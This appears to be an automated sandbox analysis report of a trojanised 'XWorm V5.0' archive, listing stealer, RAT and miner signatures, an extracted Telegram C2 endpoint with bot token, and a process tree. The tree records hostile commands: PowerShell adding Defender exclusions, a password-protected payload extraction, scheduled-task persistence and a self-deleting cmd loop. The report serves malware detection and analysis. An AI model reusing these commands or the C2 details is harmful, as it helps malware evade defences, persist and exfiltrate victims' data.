Analysis
-
max time kernel
225s -
max time network
218s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
10-04-2024 18:24
General
-
Target
https://www.upload.ee/files/15813331/XWorm_V5.0.zip.html
Score
10/10
Malware Config
Extracted
Family
phemedrone
C2
https://api.telegram.org/bot5393393816:AAEAXp-5zN1DxlsNGsPhc99RWe99d19vZ3I/sendMessage?chat_id=-1001523505230
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Phemedrone
An information and wallet stealer written in C#.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
AgentTesla payload 1 IoCs
-
XMRig Miner payload 2 IoCs
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 3 IoCs
-
Executes dropped EXE 13 IoCs
-
Loads dropped DLL 7 IoCs
-
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
-
Suspicious use of SetThreadContext 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 58 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 64 IoCs
-
Enumerates system info in registry 2 TTPs 6 IoCs
-
Modifies Internet Explorer settings 1 TTPs 12 IoCs
-
Modifies registry class 64 IoCs
-
NTFS ADS 3 IoCs
-
Runs regedit.exe 1 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 21 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 57 IoCs
-
Suspicious use of SetWindowsHookEx 8 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.upload.ee/files/15813331/XWorm_V5.0.zip.html1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd864646f8,0x7ffd86464708,0x7ffd864647182⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2072 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4172 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4676 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5736 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5736 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4880 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6360 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6776 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6732 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6984 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4652 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6748 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4616 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,15367435131970627560,16457799898770796165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4668 /prefetch:12⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\Downloads\XWorm_V5.0\XWorm V5.0\XWormLoader.exe"C:\Users\Admin\Downloads\XWorm_V5.0\XWorm V5.0\XWormLoader.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\XWorm_V5.0\XWorm V5.0\XWorrnLoader.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Downloads\XWorm_V5.0\XWorm V5.0\XWorrnLoader.exe"C:\Users\Admin\Downloads\XWorm_V5.0\XWorm V5.0\XWorrnLoader.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/XCoderTools3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd864646f8,0x7ffd86464708,0x7ffd864647184⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/XCoderTools3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd864646f8,0x7ffd86464708,0x7ffd864647184⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SetupUDPDriver.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\SetupUDPDriver.exe"C:\Users\Admin\AppData\Local\Temp\SetupUDPDriver.exe"2⤵
- Executes dropped EXE
- NTFS ADS
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txtC:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt e -p"JDQJndnqwdnqw2139dn21n3b312idDQDB" "C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txt" -o"C:\Users\Admin\AppData\Local\Temp\"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c For /L %i In (0,0,0) Do (del "C:\Users\Admin\AppData\Local\Temp\SETUPU~1.EXE"&&timeout /t 0&&if not exist "C:\Users\Admin\AppData\Local\Temp\SETUPU~1.EXE" exit)3⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout /t 04⤵
-
